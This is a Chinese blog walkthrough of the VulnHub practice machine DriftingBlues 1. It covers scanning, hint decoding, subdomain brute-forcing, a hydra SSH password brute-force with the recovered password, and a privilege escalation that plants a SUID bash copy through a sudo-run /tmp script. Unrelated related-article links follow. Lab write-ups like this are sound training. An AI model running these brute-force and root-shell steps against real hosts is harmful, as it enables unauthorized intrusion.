vulnhub靶机:drifting1

最新推荐文章于 2026-01-07 11:22:02 发布
原创 最新推荐文章于 2026-01-07 11:22:02 发布 · 724 阅读 · 15 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #linux #网络

本文描述了在网络安全环境中,通过ARP扫描、端口扫描(Nmap)、目录探测(Dirb)等技术手段对目标主机进行分析,包括Base64解密、子域名枚举、SSH密码破解以及权限提升的过程,展示了渗透测试的实战步骤。

一:主机发现

arp-scan -I eth0 10.9.23.0/24

二:端口扫描

nmap -T4 -sV -p- -A 10.9.23.102

三:目录探测

dirb http://10.9.23.102 -X .txt,.php,.html,.bak,.md

四:渗透测试

Charles Brown

sheryl@driftingblues.box

eric@driftingblues.box

L25vdGVmb3JraW5nZmlzaC50eHQ=

base64在线解密

Base64在线加密解密-在线Base64加密解密工具-Base64编码解码工具

/noteforkingfish.txt

得到一个路径

得到了一个 /noteforkingfish.txt 进行访问 发现有很多ok 直接想到了ok解码:

Brainfuck/Text/Ook! obfuscator - deobfuscator. Decode and encode online.

提示使用主机目录

driftingblues.box

先修改host文件

使用Gobuster进行子域名暴力破解

apt-get install gobuster

gobuster vhost -u driftingblues.box -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt | grep "Status: 200"

发现一个新域名,添加到host文件中

test.driftingblues.box

继续使用工具dirb扫一下刚刚得到的域名 :

dirb http://test.driftingblues.box

在robot.txt中得到的目录得到

/ssh_cred.txt

1mw4ckyyucky

提示ssh后面加了一个数字作为密码,所以自己创建一个密码字典进行爆破

hydra -l eric -P 1password.txt -v 10.9.23.102 ssh

得到密码为:

1mw4ckyyucky6

ssh登录

ssh eric@10.9.23.102

在user.txt中发现第一个flag

尝试提权

继续查看一下备份文件backup.sh 发现sudo执行/tmp/emergency文件 但是/tmp 下面没有 需要创建 并将eric用户加入sudo

echo 'cp /bin/bash /tmp/getroot; chmod +s /tmp/getroot' > /tmp/emergency
chmod +x emergency
./getroot -p

chmod +x emergency
./getroot -p


 

切换到root得到第二个flag

不言君
关注
[Vulnhub靶机] DriftingBlues: 5
网安日记本的博客
02-13 2303
[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法(个人分享)
VulnHub:crossroads靶机实战
Aukum的博客
07-03 1398
smb+反弹shell+图片隐写+suid提权,拿下vulnhub-crossroads。
Vulnhub靶机driftingblues 5
qq_48904485的博客
01-15 934
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机driftingblues5(10.0.2.21)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/driftingblues-5,662/
vulnhub靶机driftingblues-2
waitagirl的博客
03-20 740
drifting2靶机
Vulnhub--DriftingBlues-1靶机通关详解
m0_72634167的博客
03-21 2260
1.自动任务提权的思路2.gobuster工具爆破子域名3.crunch生成密码列表的命令行工具的使用。
VulnHub-driftingblues:9
热门推荐
江左盟的博客
06-20 1万+
简介 信息收集 扫 管理地址 啊 漏洞发现 漏洞利用 权限提升
Vulnhub--DriftingBlues-2靶机通关详解
m0_72634167的博客
03-28 1547
1.图片隐写的认知2.wpsacn工具的使用3.ssh公私钥的认知4.nmap文件的提权方式。
Vulnhub靶场-Driftingblues 6靶机(至获取shell)
Zhou15934414455的博客
12-28 765
注意,我们之前扫描目录的时候还扫描到一个/textpattern/files/的目录,我们访问该目录,发现了我们上传的文件位置便是在这个目录下。访问robots.txt,存在一个textpattern/textpattern目录,我们访问为一个登录窗口,sqlmap无法注入。扫描到了spammer.zip 和spammer,我们访问这两个不管哪儿个页面都是给我们下载一个压缩包。提示我们扫目录时添加.zip扩展名,所以我们使用gobuster来添加扩展名进行扫描。使用菜刀直接连接,我们便获取到了shell。
Vulnhub —— DriftingBlues系列
7ruth0hn的博客
11-27 922
文章目录写在前面思路DriftingBlues: 11.nmap扫描Tip:若靶机无法获取IP:2.漏洞探测与利用3.提权DriftingBlues: 2结语参考资料 写在前面 取证学习告一段落了,虽然个人赛失手了,但团体赛一等奖还是可以接受的。开始拖了很久的渗透学习 渗透工具: Nmap v7.91、gobuster、DIRB v2.22、crunch version 3.6、Hydra v9.1、pspy - version: v1.2.0 思路 DriftingBlues: 1 在官网下载ova文件
Vulnhub靶机:Web Machine(N7)
2401_85578339的博客
03-20 630
将role的位置进行两次URL解码,一次base64解码,一次MD5解密得到admin。将其输入得到flag的后半段。
Vulnhub 靶机: ICA: 1
weixin_69670995的博客
05-13 1277
进入root目录,查看root.txt文件,这里我使用的是tac命令查看的root.txt文件,因为使用cat命令,会直接执行我们伪造的cat程序,所有我使用的是tac命令,也可以将我们伪造的cat程序删除,就可以使用cat命令执行了。扫描出来的东西很多,使用浏览器访问一下目录,没有什么有用的信息,查看一下首页的源代码,也没有什么有用的信息,一时间没有什么思路,在页面上看到是"qdPM9.2"框架,查看一下kali上有没有这个框架的漏洞。发现开着22,80,3360,使用浏览器访问80端口。
vulnhub靶机:presidential1
weixin_52450702的博客
12-12 1063
vulnhub靶机:presidential1
Vulnhub靶机:Bellatrix
qq_48904485的博客
03-03 692
一、介绍 运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:Bellatrix(10.0.2.9) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/hogwarts-bellatrix,609/ 二、信息收集 使用nmap主机发现靶机ip:10.0.2.9 使用nmap端口扫描发现靶机开放端口:22、80 nmap -A 10.0.2.9 -p 1-65535 打开网站未发现什么功能点 查看源码发现隐藏信息,
Vulnhub靶机:RickdiculouslyEasy: 1
whoami
09-23 1499
Vulnhub靶机:RickdiculouslyEasy: 1实战
大型企业服务器托管选型指南:尚航科技的综合优势与适用场景分析
m0_61259197的博客
01-06 428
大型企业的服务器托管不仅是技术决策,更是关乎业务连续性、数据主权和长期竞争力的战略选择。对于大型企业而言,服务器托管决策远比中小企业复杂且关键。它关系到以及长期数字化转型路径。大型企业需要的不再是简单的机柜和带宽资源,而是能够承载其复杂IT架构、满足严格服务水平协议(SLA)并支持未来业务创新的数字基础设施。本文将深入剖析大型企业服务器托管的关键需求,并以尚航科技为主要分析对象,对比不同类型服务商的优势与局限,为大型企业的决策提供全面、客观的参考框架。
如何在CentOS 7.9服务器上配置并调优Docker Swarm集群,确保多容器管理与高效服务发现
A5互联
01-05 727
在企业级微服务架构中,Docker Swarm作为Docker官方原生的集群编排解决方案,以其轻量、与Docker原生兼容等特点,仍在许多中小规模生产环境中获得采用。本文基于真实项目环境,从硬件架构、系统调优、Swarm集群搭建、网络/服务发现、安全配置与性能评估等方面,A5IDC提供一套在CentOS 7.9服务器上配置并调优Docker Swarm集群的技术方案。
香港服务器为何需要IPMI?好用吗
SonderCloud_的博客
01-06 727
在当今数字化时代,香港作为全球重要的数据中心枢纽,其服务器托管服务备受企业青睐。对于使用香港服务器的用户而言,IPMI(智能平台管理接口)是一个关键且实用的技术工具。那么,香港服务器为何需要IPMI?它又是否好用呢?
共享目录挂载到其他服务器
最新发布
舒婷(Zoe)
01-07 138
/100.100.100.158/d/recv /home/sftp/mysftp/recv cifs username=158windows用户,password=windows密码,uid=mysftp,gid=sftp,file_mode=0644,dir_mode=0755,_netdev 0 0。\\100.100.100.158\d\send 导出目录:/home/sftp/mysftp/send (100.90.54.183 mysftp/sftp)远程目录:/home/output。
linux触发panic后进行自定义收尾回调处理
最后一个bug的博客
01-01 477
以上就是我的一些技巧和注意事项分享了。大家好,我是bug菌~
vulnhub靶机系列:
09-09
1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值